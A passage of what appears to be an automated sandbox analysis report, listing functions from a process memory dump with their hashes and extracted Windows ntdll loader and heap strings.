                                                      • Instruction Fuzzy Hash: 2B3217B16083458FE760CF68C584BABBBE9BB88344F04492DF999C7350D7B5E948CB52
                                                      Function 05820770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: 3bd6684522eeeb597f9d4362d18f39c3b467cce7761a10b921794f34a6534c20
                                                      • Instruction ID: a3a87139484dd732d1e8228f9f912608edf9c0f08e00dfafc84ea1cc714d67b0
                                                      • Opcode Fuzzy Hash: 3bd6684522eeeb597f9d4362d18f39c3b467cce7761a10b921794f34a6534c20
                                                      • Instruction Fuzzy Hash: D5F17870B04619DFDB15CF68C888B6ABBB6FB44304F1481A9E816DB791D734ED81CBA1
                                                      Function 05811460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP[%wZ]: , xrefs: 05811712
                                                      • HEAP: , xrefs: 05811596
                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05811728
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: 268a4752d82a564a8237afea5c005da397c5ab49f6a04cb662aeec2713f1d5e8
                                                      • Instruction ID: dcaa6e7da7b0172390a37a81c95ba408eeb35a61b0e85e35a40eeac369beaf27
                                                      • Opcode Fuzzy Hash: 268a4752d82a564a8237afea5c005da397c5ab49f6a04cb662aeec2713f1d5e8
                                                      • Instruction Fuzzy Hash: F1E1E070A086459FCB25CF28C459BBABBFABF48304F148859EE96CB245E734EC40CB54
                                                      Function 0581B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                      • API String ID: 0-1145731471
                                                      • Opcode ID: e1ad0da688db508c6725ecfc2ac2a1d9f717bdaec792c16f56c0abd20b52d7d5
                                                      • Instruction ID: 1a02f2fc7ab5b4d84b6ff0fc1bf6acdbb74c55f21fd9cc01bb61d06e766489f4
                                                      • Opcode Fuzzy Hash: e1ad0da688db508c6725ecfc2ac2a1d9f717bdaec792c16f56c0abd20b52d7d5
                                                      • Instruction Fuzzy Hash: 77B19B31A096589BCB25CF69C981FADB7BABF44714F148829EC52EB280DB30EC41DB55
                                                      Function 0589368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                      • API String ID: 0-2391371766
                                                      • Opcode ID: 0574e379ca0bd2b805d865cb09e60905093823920a9452e746afa34b63ad9fd8
                                                      • Instruction ID: f199d9d560e978036191aa6460819586766f0f396890c9f3bf325fd91d6886a0
                                                      • Opcode Fuzzy Hash: 0574e379ca0bd2b805d865cb09e60905093823920a9452e746afa34b63ad9fd8
                                                      • Instruction Fuzzy Hash: F7B1AB71708745AFEB25DE58C885B6BB7E9BB44714F080C29FE41EB290DB70EC448B92
                                                      Function 0580A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 4cd5ec4182bc5e635fe1d692f8e99825b8babab60ec8466ebce4b05236e5834d
                                                      • Instruction ID: 216b7bb9cbb2927ce49a77e1cf56e5aa377f9f10c9fd19e0db1a2c9f0d7433e5
                                                      • Opcode Fuzzy Hash: 4cd5ec4182bc5e635fe1d692f8e99825b8babab60ec8466ebce4b05236e5834d
                                                      • Instruction Fuzzy Hash: A4A149759116299BDB21DF68CC88BAAB7B8FF48710F1001E9ED09E7250DB359E84CF51
                                                      Function 058A36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                      • API String ID: 0-318774311
                                                      • Opcode ID: e61448ff10caa0f61ce5f7f422a069624dcf81e43da7b63c6a8751175785ffcc
                                                      • Instruction ID: 546d2d0600f7843e8803b386f65d43279b990a89169c40ea262252f57c8eaf1f
                                                      • Opcode Fuzzy Hash: e61448ff10caa0f61ce5f7f422a069624dcf81e43da7b63c6a8751175785ffcc
                                                      • Instruction Fuzzy Hash: CC816876608340ABE312DB18C845B6ABBE9FF85754F440D29BD82DB390DB74DD44CB62
                                                      Function 0581B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                      • API String ID: 0-373624363
                                                      • Opcode ID: 7c36f67a64d9711f27ec3f69e2e58a577d872e8d2241f42cf3c54f393db02c94
                                                      • Instruction ID: 0aca1d4bb58bd04d3d8673f33ab20029d29b0e23addad76464d5ef60dbe82fef
                                                      • Opcode Fuzzy Hash: 7c36f67a64d9711f27ec3f69e2e58a577d872e8d2241f42cf3c54f393db02c94
                                                      • Instruction Fuzzy Hash: A791CA71A08209CBDB21CF58C440BEEB7B9BF05369F148595EC42EB290D778DE80CB95
                                                      Function 0584909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&$@
                                                      • API String ID: 0-1537733988
                                                      • Opcode ID: 4612389e6b02ddaab660d45fc33cb8381d4b1136c821113440587c5e6d22958d
                                                      • Instruction ID: 115a26f77420201d106c7f79d3f12bc98031e107f1b0810491ab0d7bb3080822
                                                      • Opcode Fuzzy Hash: 4612389e6b02ddaab660d45fc33cb8381d4b1136c821113440587c5e6d22958d
                                                      • Instruction Fuzzy Hash: F2715A706093499FC724EF28C584A2BBBE6BF85618F10895DECAAC7291D731DD05CF92
                                                      Function 058EB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • TargetNtPath, xrefs: 058EB82F
                                                      • GlobalizationUserSettings, xrefs: 058EB834
                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 058EB82A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                      • API String ID: 0-505981995
                                                      • Opcode ID: a6336c9c3607a002a6684883742d0733f8ae33b1f8d6472cb685df0d0a4149af
                                                      • Instruction ID: b242306332b2233c4659f60a8729a595ed59af3481ff952e49acec703c8e0869
                                                      • Opcode Fuzzy Hash: a6336c9c3607a002a6684883742d0733f8ae33b1f8d6472cb685df0d0a4149af
                                                      • Instruction Fuzzy Hash: 50617072941228ABDB21EF54DC89BDAB7B9BF09715F0101E5AD08EB250DB74DE80CF90
                                                      Function 0580F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0586E6C6
                                                      • HEAP[%wZ]: , xrefs: 0586E6A6
                                                      • HEAP: , xrefs: 0586E6B3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                      • API String ID: 0-1340214556
                                                      • Opcode ID: 80a4d37dceb8a6db5da1dcb3e1184a852b0d531f33599d8b25a409e9a99e8151
                                                      • Instruction ID: 1cf52b7877a9dc49838a955a689cc0fa8e19098adfef129816364f0781538cfc
                                                      • Opcode Fuzzy Hash: 80a4d37dceb8a6db5da1dcb3e1184a852b0d531f33599d8b25a409e9a99e8151
                                                      • Instruction Fuzzy Hash: 1F51C235704744AFE722DB68C959FAABBF9BF05304F0440A5EA41DB692D778ED40CB11
                                                      Function 058315F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0587A589
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0587A59A
                                                      • LdrpCompleteMapModule, xrefs: 0587A590
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 59a9bf2101b21fb82a8b252b0d4ea8ac709d63210fb9bd2496a6c0da7bdccf15
                                                      • Instruction ID: fbd2b3a15a3b64312b75aac0735a59c08b49c9ec1548320bd3774b5340cb7edc
                                                      • Opcode Fuzzy Hash: 59a9bf2101b21fb82a8b252b0d4ea8ac709d63210fb9bd2496a6c0da7bdccf15
                                                      • Instruction Fuzzy Hash: E75113707047499BDB25CB9CC949B2A7BE9BF00B18F180669ED52DB6E1E774EC40C781
                                                      Function 0584C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 058882E8
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 058882DE
                                                      • Failed to reallocate the system dirs string !, xrefs: 058882D7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: b01711c3cf6ad3b3d0d21f555b3fdc1c1b9e70ea666ba38ddad4f4fff3f96b43
                                                      • Instruction ID: 3126b390e938c1e31f6c47c32428fce5fdf5e5d0c3c016053402fdde8e35899e
                                                      • Opcode Fuzzy Hash: b01711c3cf6ad3b3d0d21f555b3fdc1c1b9e70ea666ba38ddad4f4fff3f96b43
                                                      • Instruction Fuzzy Hash: 4F41BFB1659304ABD720EB68D849B6B7BA8AB44650F00592ABD45D3250EB70DC008B92
                                                      Function 0580758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                      • API String ID: 0-1151232445
                                                      • Opcode ID: f463b664cd9d14df645f45c8fc32defe3b89fe00c25e9787e4ffc7215428471f
                                                      • Instruction ID: e194dcf191c84bde182f45692b3c5ecfe8ea1e8d3a5ed8afbc05ab0721d8d0ea
                                                      • Opcode Fuzzy Hash: f463b664cd9d14df645f45c8fc32defe3b89fe00c25e9787e4ffc7215428471f
                                                      • Instruction Fuzzy Hash: 5941F5B0304241DFEFA9CA1CC884F7977A2EF01208F185469DC57DB296D664EC45CB52
                                                      Function 058416CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05881B39
                                                      • LdrpAllocateTls, xrefs: 05881B40
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05881B4A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-4274184382
                                                      • Opcode ID: 8178caabb3bdb855b4fea15ff7f7a12a54958fa3bfc8df08768632bacbc75b40
                                                      • Instruction ID: 1686039c95814d04b0dd0ae7568842d4840156dab9dcf5524d8037268de62d76
                                                      • Opcode Fuzzy Hash: 8178caabb3bdb855b4fea15ff7f7a12a54958fa3bfc8df08768632bacbc75b40
                                                      • Instruction Fuzzy Hash: E6419AB5A04708AFDB15DFA8C849AAEBBF6FF48714F148519E806E7244DB74AC41CF90
                                                      Function 058CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 058CC212
                                                      • @, xrefs: 058CC1F1
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 058CC1C5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: b0a9d4f32f09e280dd39e5ee19f72ad76732c16ba1b8e140dc8f4ad02d1e904d
                                                      • Instruction ID: 9dd169781d36d17fb4c6e1489d7928c14d4de2fcb8f075c35bd9d54d4c8518a9
                                                      • Opcode Fuzzy Hash: b0a9d4f32f09e280dd39e5ee19f72ad76732c16ba1b8e140dc8f4ad02d1e904d
                                                      • Instruction Fuzzy Hash: E5415072A00219EBDF11DAD8C855FEEBBB9BB04714F1440AAED1BE7280D774DE448B91
                                                      Function 05894755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpCheckRedirection, xrefs: 0589488F
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05894888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05894899
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 4552175401ac3ee6414eae52a8d903be8fa89d2c29841756d8884179d8df8afe
                                                      • Instruction ID: e01ffa299b6109c03d72ee737c9ff862c4d744d32d3aa28530d5290457b03c11
                                                      • Opcode Fuzzy Hash: 4552175401ac3ee6414eae52a8d903be8fa89d2c29841756d8884179d8df8afe
                                                      • Instruction Fuzzy Hash: 6D41D036A183589FCF29CE68D841A767BE5FF89A54B0E0559EC49E7321D730DC02CB81
                                                      Function 058A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: 3de9b7f09c766ce3d922895cb6060774176325ead9de27f43234045da6837780
                                                      • Instruction ID: 90a77e15d3fdbf2fecf093ebddfe189a18be637ba102fd8506140ec78a2dcb44
                                                      • Opcode Fuzzy Hash: 3de9b7f09c766ce3d922895cb6060774176325ead9de27f43234045da6837780
                                                      • Instruction Fuzzy Hash: BB41F932A047588BEF25DB98C844BADB7B5FF45344F140469DD02EB7A1EBB48D01CB11
                                                      Function 058433A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() passed the empty activation context data, xrefs: 058829FE
                                                      • Actx , xrefs: 058433AC
                                                      • RtlCreateActivationContext, xrefs: 058829F9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                      • API String ID: 0-859632880
                                                      • Opcode ID: aff6aeff989111f22c0d430c222a337496a3484998a96946ecf4429ad5fc13cc
                                                      • Instruction ID: b5375057e3b844dd753b0b91a46df2646ac5b90e931380f680cd078fc87624f0
                                                      • Opcode Fuzzy Hash: aff6aeff989111f22c0d430c222a337496a3484998a96946ecf4429ad5fc13cc
                                                      • Instruction Fuzzy Hash: 503124362003199FDB26DE68C884FAA77A5FF54724F054869ED06EF281CB30DD81CB90
                                                      Function 0589B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • GlobalFlag, xrefs: 0589B68F
                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0589B632
                                                      • @, xrefs: 0589B670
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                      • API String ID: 0-4192008846
                                                      • Opcode ID: e7dca44aeccdc8440e7dcba7cc9666d5ae0328fc247bcb6d26f6108a95a8826e
                                                      • Instruction ID: 1433721b398ee781e1cb832a40d8be90ca6f9b65cfd33bce5ef7c6190e046dee
                                                      • Opcode Fuzzy Hash: e7dca44aeccdc8440e7dcba7cc9666d5ae0328fc247bcb6d26f6108a95a8826e
                                                      • Instruction Fuzzy Hash: 9C3149B1A00259AFDF15EF98DC84AEEBBB8EB44744F140469EE05E6240D774AE40CBA5
                                                      Function 05841607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializeTls, xrefs: 05881A47
                                                      • DLL "%wZ" has TLS information at %p, xrefs: 05881A40
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05881A51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-931879808
                                                      • Opcode ID: 8da7f0996c325a0363b732cd04c27056a0b9e38ea5ed391d466a723ee56a380d
                                                      • Instruction ID: 4e3668914efdb31764e9cd6a66fd039964153d766be6b42299f0ed5b20f629ec
                                                      • Opcode Fuzzy Hash: 8da7f0996c325a0363b732cd04c27056a0b9e38ea5ed391d466a723ee56a380d
                                                      • Instruction Fuzzy Hash: 07319072B14318AFEB10DA58C88EF7A76A9FB41658F060559ED05E7190DB70ED81CFA0
                                                      Function 058920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05892104
                                                      • Process initialization failed with status 0x%08lx, xrefs: 058920F3
                                                      • LdrpInitializationFailure, xrefs: 058920FA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: a0640f379c82db73f35911ef7ed2a53cf4a95872149d8beb56945317d4a26441
                                                      • Instruction ID: c2f99a19ab488c77348aa3c54ff4677c5f0fa48e9bbef9f617027f6a416f7af3
                                                      • Opcode Fuzzy Hash: a0640f379c82db73f35911ef7ed2a53cf4a95872149d8beb56945317d4a26441
                                                      • Instruction Fuzzy Hash: D2F0F474750308BFDB14E60CDC4BFA93768FB40B14F440458FA01A7282D6B0AD50D681
                                                      Function 058203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: c8925f2337df74d3bbfe5eb80ecb2355548e10b73304a6ecc26c3cb7c29b4c99
                                                      • Instruction ID: 7d6cb96d4fb70644be8c63217f43d27de1d1014d8ca408789062275717c609bd
                                                      • Opcode Fuzzy Hash: c8925f2337df74d3bbfe5eb80ecb2355548e10b73304a6ecc26c3cb7c29b4c99
                                                      • Instruction Fuzzy Hash: B7714A71A002599FCB05DFA8C998EAEBBB8FF08704F144065ED05E7251EA38EE41CB61
                                                      Function 0588E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: fc41e5e7775b4ab37ad5b31b5568aa1a988463c1c47bb8d17f8258923cf5dad1
                                                      • Instruction ID: 1b9c82ba3c6215c92062677ac1b871a941a31299e7f14c02ca1b3e531ad7f81c
                                                      • Opcode Fuzzy Hash: fc41e5e7775b4ab37ad5b31b5568aa1a988463c1c47bb8d17f8258923cf5dad1
                                                      • Instruction Fuzzy Hash: FA616A71E047189FDB24EFA8C885BBEBBB9FB48704F504029EA49EB251D731AD40CB50
                                                      Function 0582F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$
                                                      • API String ID: 0-233714265
                                                      • Opcode ID: 959aea5cb5947639e50d4fdfec85febcab00945619c7101a1dd443320258e824
                                                      • Instruction ID: 168f1f64305106c964f7760556f95285bc9c91051c73d687a91815a506eab469
                                                      • Opcode Fuzzy Hash: 959aea5cb5947639e50d4fdfec85febcab00945619c7101a1dd443320258e824
                                                      • Instruction Fuzzy Hash: A861AE71A04759DFDB20DFA8C58ABA9BBB2BF44704F104429DE05EB680DB74AD81CB91
                                                      Function 058104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • kLsE, xrefs: 05810540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0581063D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: 92dfdd9781cfba6279a70f3e6c4700022adc8e8fa9c3bd2f72dc4d12e73341cd
                                                      • Instruction ID: 15c6fca563bf13476d4b33f19df829c5558336a1b896a436a1606560370fcf5b
                                                      • Opcode Fuzzy Hash: 92dfdd9781cfba6279a70f3e6c4700022adc8e8fa9c3bd2f72dc4d12e73341cd
                                                      • Instruction Fuzzy Hash: B1518D71604746CBC724EF69C948AA7B7E9BF84304F00483EED9AC7240E770D985CB9A
                                                      Function 058A35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                      • API String ID: 0-118005554
                                                      • Opcode ID: d0feb074b4b944f915a134c05c4f83151d3aed6dfcb3271b33068c123dec0a6e
                                                      • Instruction ID: e9d40e71f12fe70cab065e5ad22edd05c7a8d77dbb62ee7602c8e7d758b8e227
                                                      • Opcode Fuzzy Hash: d0feb074b4b944f915a134c05c4f83151d3aed6dfcb3271b33068c123dec0a6e
                                                      • Instruction Fuzzy Hash: 963197322087859BE312DB68D858B2AB7E4AFC5714F08086ABD55CB391EA34DD45CB92
                                                      Function 058434B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Strings
